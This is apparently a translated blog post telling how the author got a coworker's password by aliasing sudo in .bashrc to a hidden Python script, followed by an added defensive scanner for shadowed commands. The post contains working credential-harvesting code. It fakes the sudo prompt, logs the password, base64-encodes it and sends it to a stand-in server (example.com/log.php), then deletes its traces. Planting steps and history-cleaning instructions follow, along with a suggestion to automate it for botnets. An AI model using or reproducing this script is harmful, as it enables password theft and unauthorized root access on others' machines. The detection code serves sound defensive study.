
Linux - the story of one hacking

Hello World!
Today I would like to share an instructive story about how I once obtained root access to a colleague's work computer, and how frighteningly easy it turned out to be.

Background

The working day was going the way it usually goes for any average developer: monitor, keyboard, tea, biscuits... In short, nothing remarkable was expected, as always. Tired of a long debugging session in Xdebug, I decided to step out of the office for some fresh air to get my (by then "cast-iron") head back in order.

Returning to my desk, I had barely sat down when a gloating voice came from the next table:

- Listen, your browser's process id is XXXX, right?

Running ps -A | grep opera, I saw that the pid really was the one my colleague had named.

- So what? - I answered in a calm voice.
- Nothing, - said my colleague, and pressed Enter on his own keyboard. My browser window closed before my eyes.

I immediately started looking for a process on my system that could be providing a remote shell. It was not ssh.
My colleague hinted that it was nc (netcat); its process was, of course, killed at once.
We both laughed and discussed the funny incident. It turned out there had been no real hacking at all: "nc" had simply been launched under my own user account while I was away from my desk. Just for lulz.
The joke was a success, but somewhere in the back of my mind I decided that the matter could not be left there. It was a challenge!

The gist

One icy winter day, right before New Year, I decided the time for revenge had come. This time, though, I wanted to seize the machine completely: get root.

The New Year preparations in the office created plenty of bustle and noise. It was the right moment, because after the incident my colleague had started locking his screen whenever he left his desk. I knew that today was the day when the chance that he would forget to lock it was as high as it would ever be.

Using a small "window" in my working time, I started drawing up a plan. The main problem to solve was, of course, obtaining the root account itself; everything else is merely a matter of technique. An active search for ideas on how this could be done at all began.

My colleague was running Linux Mint 14 "Nadia", kernel version 3.5. Although the kernel was not that old, the chance of quickly finding a working, publicly available local exploit was close to zero. Apart from Apache he had practically no services running, and Apache was closed to external access.

Discarding one idea after another, it finally dawned on me: what about trying the simplest and most banal thing, a bash alias?
Deciding to check my guess, I opened a terminal (Debian Squeeze), created a test.py file containing a banal print "Hello, world!", saved it in my home directory, and executed the command:
    alias sudo="$HOME/temp.py"

after that I typed:

    sudo mc

result:

    Hello, world!

There it was! A perfectly "legal" hole in security. Trite, but effective.

And now the script (Python 2, as in the original; the comments are descriptive, the original Russian ones did not survive extraction):

    #!/usr/bin/env python
    # PEP 8 is not followed here, so no stone-throwing please.
    import os, sys, time, subprocess, getpass, urllib, base64

    url = 'http://example.com/log.php?data=%s'
    user = getpass.getuser()

    # Imitate the sudo password prompt.
    passwd = getpass.getpass("[sudo] password for %s: " % user)
    msg = user + ':' + passwd
    home = os.path.expanduser('~')
    script = sys.argv[0]

    # Save the captured credentials locally.
    with open(os.path.join(home, ".xsession-name"), "a+") as f:
        f.write(msg + "\n")

    # Send them to the gateway, base64-encoded in the query string.
    urllib.urlopen(url % base64.b64encode(msg))

    # Remove the alias line (the last line) from .bashrc.
    with open(os.path.join(home, '.bashrc'), 'r+') as f:
        lines = f.readlines()[:-1]
        f.seek(0)
        f.writelines(lines)
        f.truncate()

    # Pause, then pretend the password was wrong, as real sudo would.
    time.sleep(2)
    print "Sorry, try again"

    # Hand over to the real sudo with the original arguments.
    subprocess.call(['sudo'] + sys.argv[1:])

    # Finally, kill the interpreter and delete the script itself.
    os.system('pkill python & rm %s' % script)


In brief: the script imitates the sudo password prompt, intercepts the password and sends it to the specified server, where the information is simply written to a file.

Taking advantage of my colleague's temporary absence from his desk, I moved over to his computer and began my "special operation":

1. Create a permanent alias in .bashrc:

    echo 'alias sudo="'$HOME'/.xsession-lock"' >> $HOME/.bashrc

2. Create a file with the inconspicuous name .xsession-lock, so that it does not catch the eye in a listing of /home/user, and save our Python script into it.
3. Make .xsession-lock executable: chmod +x.
4. Clean bash_history!
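The check a defender would want after reading the steps above: the following Python 3 script is an added example, not the article's code or a tool the author used. It scans the shell startup files for alias or function definitions that redefine sudo (or similar privileged commands), flags user-writable directories prepended to PATH (a related way to shadow a command), and lists executable dotfiles in the home directory, which is exactly the shape of the .xsession-lock file above. The sample .bashrc text, the file-mode list, and the names WATCHED, scan_rc_text, flag_hidden_executables and audit_home are all constructed for this example.

```python
#!/usr/bin/env python3
"""Audit bash startup files for a shadowed sudo (added example, not from the post).

The SAMPLE_BASHRC text is constructed for this example; audit_home() applies the
same checks to a real home directory. All function names here are assumptions.
"""
import os
import re
import stat

# Commands whose redefinition in a user's own rc file deserves a look.
WATCHED = frozenset({"sudo", "su", "gksudo", "pkexec", "ssh", "passwd"})

RC_FILES = (".bashrc", ".bash_aliases", ".bash_profile", ".profile", ".zshrc")

ALIAS_RE = re.compile(r"^\s*alias\s+(?P<name>[A-Za-z_][\w.-]*)=(?P<target>.+)$")
# Matches both "name() {" and "function name {" / "function name() {".
FUNC_RE = re.compile(
    r"^\s*(?:function\s+(?P<kw>[A-Za-z_][\w.-]*)\s*(?:\(\))?"
    r"|(?P<paren>[A-Za-z_][\w.-]*)\s*\(\))\s*\{"
)
PATH_RE = re.compile(r"^\s*(?:export\s+)?PATH=(?P<value>.+)$")


def _user_writable(component):
    """Heuristic: empty, relative, ~ or $HOME-based PATH entries are user-writable."""
    c = component.strip("\"'")
    return c == "" or not c.startswith("/")


def scan_rc_text(text, source="<rc>"):
    """Return findings for alias/function/PATH lines that could hijack a watched command."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        m = ALIAS_RE.match(line)
        if m and m.group("name") in WATCHED:
            findings.append(dict(source=source, line=lineno, kind="alias", severity="high",
                                 name=m.group("name"), detail=m.group("target")))
            continue
        m = FUNC_RE.match(line)
        if m:
            name = m.group("kw") or m.group("paren")
            if name in WATCHED:
                findings.append(dict(source=source, line=lineno, kind="function",
                                     severity="high", name=name, detail=line.strip()))
            continue
        m = PATH_RE.match(line)
        if m:
            prepended = []
            for comp in m.group("value").strip("\"'").split(":"):
                if comp in ("$PATH", "${PATH}"):
                    break  # only entries searched BEFORE the old PATH matter
                if _user_writable(comp):
                    prepended.append(comp)
            if prepended:
                findings.append(dict(source=source, line=lineno, kind="path_prepend",
                                     severity="info", name="PATH", detail=":".join(prepended)))
    return findings


def flag_hidden_executables(entries):
    """Given (name, st_mode) pairs from a home directory, return dotfiles that are
    regular files with an execute bit set (the .xsession-lock pattern)."""
    return sorted(name for name, mode in entries
                  if name.startswith(".") and stat.S_ISREG(mode) and mode & 0o111)


def audit_home(home=None):
    """Run both checks against a real home directory and return all findings."""
    home = home or os.path.expanduser("~")
    findings = []
    for rc in RC_FILES:
        path = os.path.join(home, rc)
        if os.path.isfile(path):
            with open(path, errors="replace") as f:
                findings.extend(scan_rc_text(f.read(), source=path))
    entries = [(e.name, e.stat(follow_symlinks=False).st_mode) for e in os.scandir(home)]
    for name in flag_hidden_executables(entries):
        findings.append(dict(source=os.path.join(home, name), line=0, kind="hidden_executable",
                             severity="medium", name=name, detail="executable dotfile in $HOME"))
    return findings


# Constructed sample rc file, modelled on the article's alias trick (not a real file).
SAMPLE_BASHRC = """\
# ~/.bashrc  (constructed sample)
export EDITOR=vim
alias ll='ls -alF'
alias sudo="$HOME/.xsession-lock"
export PATH=$HOME/.local/bin:$PATH
su() { "$HOME/.cache/su-wrapper" "$@"; }
"""

if __name__ == "__main__":
    for f in scan_rc_text(SAMPLE_BASHRC, "sample .bashrc"):
        print(f"[{f['severity']}] {f['source']}:{f['line']} {f['kind']} {f['name']}: {f['detail']}")
```

Run without arguments it reports three findings on the sample: the sudo alias and the su function as high, and the $HOME/.local/bin prepend as info (that line is common and benign in itself, which is why it is only informational). On a live system, type sudo in the affected shell shows the same thing interactively; \sudo bypasses an alias and command sudo bypasses both an alias and a function, but neither helps against a user-writable directory placed ahead of /usr/bin in PATH, so the rc file itself has to be inspected.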

The first thing my colleague did on his return, expecting some trick, was to examine his bash_history carefully; noticing nothing, he started working.
After a while I checked the log file on the remote server where the passwords were being saved, and there it was, the catch of my dreams: root!
To be precise, it was actually the password of my colleague's ordinary user account, but that gave me the opportunity to obtain root and gain a foothold in the system.

Later I again waited for my colleague to leave the office and "worked my magic" on his computer as root, but, unfortunately, I misjudged the timing and was caught! Alas, caught red-handed right at the scene of the "crime".

We laughed again, discussed the details of the "hacking", and then celebrated the New Year in a friendly and cheerful way with the whole office.
So that is my New Year's story.

Conclusion

Now that Valve has released Steam for Linux, an influx of casual users towards Linux systems has become likely, and with it the likelihood that the gentlemen of the black-hat world will turn their eyes to Linux.

So I would like this article to serve as one more reminder that "the rescue of the drowning is the business of the drowning themselves".
Having installed Linux, do not assume you have been wrapped in cotton wool. The responsibility for the security of your information still lies with you!

PS The method described above could well be applied in automated form, for example when building botnets. On this principle one could write a loader that lies in wait for the user to enter a password, whether for sudo or gksudo, and afterwards turns the computer into a "zombie machine".
Moreover, popular distributions ship with exactly the default settings that allow the method from this article to work.
I hope that nothing changes in the security world of *nix systems in the near future and that Linux "lockers" and similar nonsense do not start appearing.

PPS Hi Yanovsky !

Source: https://habr.com/ru/post/200912/
